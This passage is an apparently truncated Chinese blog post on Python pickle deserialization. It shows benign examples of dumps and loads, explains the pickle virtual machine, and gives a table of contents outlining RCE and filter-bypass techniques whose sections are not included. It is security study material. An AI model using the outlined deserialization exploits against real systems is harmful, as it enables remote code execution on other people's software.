<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/hah.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/hah.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/hah.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha256-wiz7ZSCn/btzhjKDQBms9Hx4sSeUYsDrTLg7roPstac=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"fupanc.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.19.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="pickle反序列化本篇文章用于简单入门，pickle反序列化危害性大，可以直接RCE">
<meta property="og:type" content="article">
<meta property="og:title" content="pickle反序列化">
<meta property="og:url" content="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Fupanc">
<meta property="og:description" content="pickle反序列化本篇文章用于简单入门，pickle反序列化危害性大，可以直接RCE">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20240506174804669.png">
<meta property="og:image" content="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20240509003635408.png">
<meta property="article:published_time" content="2024-05-09T14:10:02.260Z">
<meta property="article:modified_time" content="2024-05-19T13:14:24.925Z">
<meta property="article:author" content="Fupanc">
<meta property="article:tag" content="学习笔记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20240506174804669.png">


<link rel="canonical" href="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/","path":"2024/05/09/pickle反序列化/","title":"pickle反序列化"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>pickle反序列化 | Fupanc</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Fupanc" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Fupanc</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Fupanc's blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.</span> <span class="nav-text">pickle反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E7%9F%A5%E8%AF%86"><span class="nav-number">1.1.</span> <span class="nav-text">基本知识</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#pickle%E7%AE%80%E4%BB%8B"><span class="nav-number">1.1.0.1.</span> <span class="nav-text">pickle简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%AF%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%AF%B9%E8%B1%A1"><span class="nav-number">1.1.0.2.</span> <span class="nav-text">可序列化的对象</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#pickle%E6%A8%A1%E5%9D%97%E9%83%A8%E5%88%86%E8%AF%B4%E6%98%8E"><span class="nav-number">1.1.0.3.</span> <span class="nav-text">pickle模块部分说明</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#pickle-dumps-obj"><span class="nav-number">1.1.0.3.1.</span> <span class="nav-text">pickle.dumps(obj)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#pickle-loads-bytes-object"><span class="nav-number">1.1.0.3.2.</span> <span class="nav-text">pickle.loads(bytes_object)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#pickle-dump-obj-file"><span class="nav-number">1.1.0.3.3.</span> <span class="nav-text">pickle.dump(obj,file)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#pickle-load-file"><span class="nav-number">1.1.0.3.4.</span> <span class="nav-text">pickle.load(file)</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pickle%E8%BF%87%E7%A8%8B%E8%AF%A6%E7%BB%86%E8%A7%A3%E8%AF%BB"><span class="nav-number">1.2.</span> <span class="nav-text">pickle过程详细解读</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#opcode%E7%AE%80%E4%BB%8B"><span class="nav-number">1.3.</span> <span class="nav-text">opcode简介</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#opcode%E7%89%88%E6%9C%AC"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">opcode版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#pickletools"><span class="nav-number">1.3.0.2.</span> <span class="nav-text">pickletools</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.4.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Unpickler-find-class-%E5%87%BD%E6%95%B0"><span class="nav-number">1.4.1.</span> <span class="nav-text">Unpickler.find_class()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%8F%E5%85%B8%E7%9A%84-reduce-%E6%96%B9%E6%B3%95"><span class="nav-number">1.4.2.</span> <span class="nav-text">经典的__reduce__方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E7%9A%84exp"><span class="nav-number">1.4.3.</span> <span class="nav-text">简单的exp</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%9A"><span class="nav-number">1.4.3.0.1.</span> <span class="nav-text">命令执行：</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%BD%93%E7%8E%AF%E5%A2%83%E6%9C%89os%E6%A8%A1%E5%9D%97%E6%97%B6"><span class="nav-number">1.4.3.0.1.1.</span> <span class="nav-text">当环境有os模块时</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%BD%93%E7%8E%AF%E5%A2%83%E6%B2%A1%E6%9C%89os%E6%A8%A1%E5%9D%97%EF%BC%88%E5%B8%B8%E7%94%A8%EF%BC%89"><span class="nav-number">1.4.3.0.1.2.</span> <span class="nav-text">当环境没有os模块（常用）</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%EF%BC%9A"><span class="nav-number">1.4.3.0.2.</span> <span class="nav-text">变量覆盖：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%89%8B%E6%B3%95"><span class="nav-number">1.4.4.</span> <span class="nav-text">绕过手法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E7%9A%84%E5%88%A9%E7%94%A8%E4%BB%A5%E5%8F%8A%E7%BB%95%E8%BF%87"><span class="nav-number">1.4.4.1.</span> <span class="nav-text">简单的利用以及绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E8%BF%87%E6%BB%A4"><span class="nav-number">1.4.4.1.0.1.</span> <span class="nav-text">函数过滤</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-number">1.4.4.1.0.2.</span> <span class="nav-text">命令执行</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%98%BE%E7%A4%BA%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A3%80%E6%B5%8B-%E5%85%B3%E9%94%AE%E5%AD%97%E7%BB%95%E8%BF%87"><span class="nav-number">1.4.4.1.0.3.</span> <span class="nav-text">绕过显示字符串检测-关键字绕过</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8D%E8%BF%9B%E9%98%B6%E7%BB%95%E8%BF%87"><span class="nav-number">1.4.4.2.</span> <span class="nav-text">稍进阶绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E6%89%8B%E5%86%99opcode"><span class="nav-number">1.4.4.2.1.</span> <span class="nav-text">如何手写opcode</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8pker%E5%B7%A5%E5%85%B7"><span class="nav-number">1.4.4.2.2.</span> <span class="nav-text">利用pker工具</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#pker%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95"><span class="nav-number">1.4.4.2.2.1.</span> <span class="nav-text">pker工具的使用方法</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#pker%EF%BC%9A%E5%87%BD%E6%95%B0%E6%89%A7%E8%A1%8C"><span class="nav-number">1.4.4.2.2.2.</span> <span class="nav-text">pker：函数执行</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E8%87%AA%E5%8A%A8%E5%8C%96%E6%9E%84%E9%80%A0"><span class="nav-number">1.4.4.2.2.3.</span> <span class="nav-text">如何自动化构造</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AF%B9opcode%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number">1.4.4.2.3.</span> <span class="nav-text">对opcode的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%BB%95%E8%BF%87find-class%E5%87%BD%E6%95%B0"><span class="nav-number">1.4.4.2.3.1.</span> <span class="nav-text">绕过find_class函数</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%88%A9%E7%94%A8builtins-globals-%E8%8E%B7%E5%8F%96%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="nav-number">1.4.4.2.3.2.</span> <span class="nav-text">利用builtins.globals()获取危险函数.</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#R%E6%8C%87%E4%BB%A4%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="nav-number">1.4.4.2.3.3.</span> <span class="nav-text">R指令被过滤</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%88%A9%E7%94%A8python%E5%86%85%E7%BD%AE%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87"><span class="nav-number">1.4.4.2.3.4.</span> <span class="nav-text">利用python内置函数绕过</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Fupanc"
      src="/images/index.jpg">
  <p class="site-author-name" itemprop="name">Fupanc</p>
  <div class="site-description" itemprop="description">志之难也，不在胜人，在于自胜</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Fupanc" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Fupanc" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:fupanc.vivo50@gmail.com" title="E-Mail → mailto:fupanc.vivo50@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/index.jpg">
      <meta itemprop="name" content="Fupanc">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Fupanc">
      <meta itemprop="description" content="志之难也，不在胜人，在于自胜">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="pickle反序列化 | Fupanc">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pickle反序列化
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-05-09 22:10:02" itemprop="dateCreated datePublished" datetime="2024-05-09T22:10:02+08:00">2024-05-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-05-19 21:14:24" itemprop="dateModified" datetime="2024-05-19T21:14:24+08:00">2024-05-19</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Python%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">Python漏洞</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Python%E6%BC%8F%E6%B4%9E/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" itemprop="url" rel="index"><span itemprop="name">pickle反序列化</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>20k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>37 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="pickle反序列化"><a href="#pickle反序列化" class="headerlink" title="pickle反序列化"></a>pickle反序列化</h1><p>本篇文章用于简单入门，pickle反序列化危害性大，可以直接RCE</p>
<span id="more"></span>

<h2 id="基本知识"><a href="#基本知识" class="headerlink" title="基本知识"></a>基本知识</h2><h4 id="pickle简介"><a href="#pickle简介" class="headerlink" title="pickle简介"></a>pickle简介</h4><ul>
<li><strong>与PHP类似，python也有序列化功能以长期储存内存中的数据</strong>。<u>pickle是python下的序列化与反序列化包。</u></li>
<li>Python有另一个更原始的序列化包marshal，marshal存在主要是为了支持Python的<code>.pyc</code>文件,现在开发时一般使用pickle。</li>
<li>与json相比，pickle以二进制储存，不易于人工阅读；json可以跨语言，而pickle是python专用的。<strong>pickle能表示python几乎所有的类型（包括自定义类型）</strong>，json只能表示一部分内置类型且不能表示自定义类型。</li>
<li><strong>pickle实际上可以看作一种独立的语言，通过对opcode的更改编写可以执行python代码、覆盖变量等操作</strong>。直接编写的opcode灵活性比使用pickle序列化生成的代码更高，有的代码不能通过pickle序列化得到（pickle解析能力大于pickle生成能力）</li>
</ul>
<p><em>目前，pickle有6种版本</em></p>
<h4 id="可序列化的对象"><a href="#可序列化的对象" class="headerlink" title="可序列化的对象"></a>可序列化的对象</h4><ul>
<li>None、True和False</li>
<li>整数、浮点数、复数</li>
<li>str、byte、bytearray</li>
<li>只包含可封存对象的集合，包括tuple、list、set和dict</li>
<li>定义在模块最外层的函数（使用def定义，lambda函数则不可以）</li>
<li>定义在模块最外层的内置函数</li>
<li>定义在模块最外层的类</li>
<li><code>__dict__</code> 属性值或 <code>__getstate__()</code> 函数的返回值可以被序列化的类</li>
</ul>
<h4 id="pickle模块部分说明"><a href="#pickle模块部分说明" class="headerlink" title="pickle模块部分说明"></a>pickle模块部分说明</h4><p>pickle模块常用的方法有：dumps、loads、dump、load</p>
<h5 id="pickle-dumps-obj"><a href="#pickle-dumps-obj" class="headerlink" title="pickle.dumps(obj)"></a>pickle.dumps(obj)</h5><ul>
<li><p><code>pickle.dumps()</code> 函数可以只接受两个参数：<strong>要序列化的对象和一个可选的 <code>protocol</code> 参数</strong>，<u>后者指定了 pickle 的协议版本,</u><code>pickle</code> 模块支持多个协议版本，<strong>从版本0到版本5</strong>。每个版本的协议都有不同的序列化格式，其中版本越高，序列化后的数据通常更为紧凑和高效。</p>
</li>
<li><p><strong>在 <code>pickle</code> 模块中，如果该项省略，则默认为0，<code>protocol</code> 参数如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。所以可以自定义版本，如下代码，不定义就是默认的</strong></p>
</li>
<li><p>含义：把obj对象序列化后以bytes对象返回，不写入文件</p>
</li>
</ul>
<p>例如如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">a=&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;bob&#x27;</span>, <span class="string">&#x27;sex&#x27;</span>: <span class="string">&#x27;boy&#x27;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;pickle版本<span class="subst">&#123;i&#125;</span>&#x27;</span>,pickle.dumps(a,protocol=i))</span><br><span class="line"></span><br><span class="line">输出：</span><br><span class="line">pickle版本<span class="number">0</span> <span class="string">b&#x27;(dp0\nVname\np1\nVbob\np2\nsVsex\np3\nVboy\np4\ns.&#x27;</span></span><br><span class="line">pickle版本<span class="number">1</span> <span class="string">b&#x27;&#125;q\x00(X\x04\x00\x00\x00nameq\x01X\x03\x00\x00\x00bobq\x02X\x03\x00\x00\x00sexq\x03X\x03\x00\x00\x00boyq\x04u.&#x27;</span></span><br><span class="line">pickle版本<span class="number">2</span> <span class="string">b&#x27;\x80\x02&#125;q\x00(X\x04\x00\x00\x00nameq\x01X\x03\x00\x00\x00bobq\x02X\x03\x00\x00\x00sexq\x03X\x03\x00\x00\x00boyq\x04u.&#x27;</span></span><br><span class="line">pickle版本<span class="number">3</span> <span class="string">b&#x27;\x80\x03&#125;q\x00(X\x04\x00\x00\x00nameq\x01X\x03\x00\x00\x00bobq\x02X\x03\x00\x00\x00sexq\x03X\x03\x00\x00\x00boyq\x04u.&#x27;</span></span><br></pre></td></tr></table></figure>

<p>可以看出不同的pickle版本有序列化出来的值不同。</p>
<h5 id="pickle-loads-bytes-object"><a href="#pickle-loads-bytes-object" class="headerlink" title="pickle.loads(bytes_object)"></a>pickle.loads(bytes_object)</h5><p><strong>注意</strong>：Pickle 协议版本是自动检测出来的，所以不需要参数来指定协议。</p>
<p><strong>含义</strong>：从bytes对象中读取一个反序列化对象，并返回其重组后的对象且特殊情况下可以返回基本类型</p>
<p>如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">a=&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;bob&#x27;</span>, <span class="string">&#x27;sex&#x27;</span>: <span class="string">&#x27;boy&#x27;</span>&#125;</span><br><span class="line">c=pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span>(c)</span><br><span class="line">d=pickle.loads(c)</span><br><span class="line"><span class="built_in">print</span>(d,<span class="built_in">type</span>(d))</span><br><span class="line"></span><br><span class="line">输出：</span><br><span class="line"><span class="string">b&#x27;\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00&#125;\x94(\x8c\x04name\x94\x8c\x03bob\x94\x8c\x03sex\x94\x8c\x03boy\x94u.&#x27;</span></span><br><span class="line">&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;bob&#x27;</span>, <span class="string">&#x27;sex&#x27;</span>: <span class="string">&#x27;boy&#x27;</span>&#125; &lt;<span class="keyword">class</span> <span class="string">&#x27;dict&#x27;</span>&gt;</span><br></pre></td></tr></table></figure>

<h5 id="pickle-dump-obj-file"><a href="#pickle-dump-obj-file" class="headerlink" title="pickle.dump(obj,file)"></a>pickle.dump(obj,file)</h5><p><strong>含义</strong>：序列化对象，并将数据流写入到文件对象中</p>
<p>由于要写入到一个文件中，故至少有两个参数，同样可以自定义pickle版本。</p>
<p>注意：使用这个就需要调用open函数来调用一个文件对象，格式如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">a=&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;bob&#x27;</span>, <span class="string">&#x27;sex&#x27;</span>: <span class="string">&#x27;boy&#x27;</span>&#125;</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./data.txt&quot;</span>,<span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f :</span><br><span class="line">    pickle.dump(a,f)</span><br></pre></td></tr></table></figure>

<p>序列化后后打开data.txt</p>
<p><img src="/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20240506174804669.png" alt="image-20240506174804669"></p>
<p>确实写入了不可读的数据</p>
<h5 id="pickle-load-file"><a href="#pickle-load-file" class="headerlink" title="pickle.load(file)"></a>pickle.load(file)</h5><p><strong>含义：</strong>反序列化对象，将文件中的数据解析为一个python对象</p>
<p><strong>注意</strong>：Pickle 协议版本是自动检测出来的，所以不需要参数来指定协议。</p>
<p>接上个板块，代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;data.txt&#x27;</span>,<span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> b:</span><br><span class="line">    <span class="built_in">print</span>(pickle.load(b))</span><br><span class="line">输出：</span><br><span class="line">&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;bob&#x27;</span>, <span class="string">&#x27;sex&#x27;</span>: <span class="string">&#x27;boy&#x27;</span>&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以看出确实成功读出来了。</p>
<h2 id="pickle过程详细解读"><a href="#pickle过程详细解读" class="headerlink" title="pickle过程详细解读"></a>pickle过程详细解读</h2><ul>
<li>pickle解析依靠Pickle Virtual Machine(PVM)进行</li>
<li>PVM涉及到三个部分：1.解析引擎 2.栈 3.内存</li>
<li>解析引擎：从流中读取opcode和参数，并对其进行解释处理。重复这个动作，知道遇到<code>.</code>为止。最终留在栈顶的值将被作为反序列化对象返回。</li>
<li>栈：由Python的list实现，被用来临时存储数据、参数以及对象。</li>
<li>memo：有Python的dict实现，为PVM的生命周期提供存储。其实就是将反序列化后的数据以<code>key-balue</code>的形式储存在memo中，以便后来使用</li>
</ul>
<h2 id="opcode简介"><a href="#opcode简介" class="headerlink" title="opcode简介"></a>opcode简介</h2><h4 id="opcode版本"><a href="#opcode版本" class="headerlink" title="opcode版本"></a>opcode版本</h4><p>当对传入的数据进行过滤的时候就需要考虑用到opcode。</p>
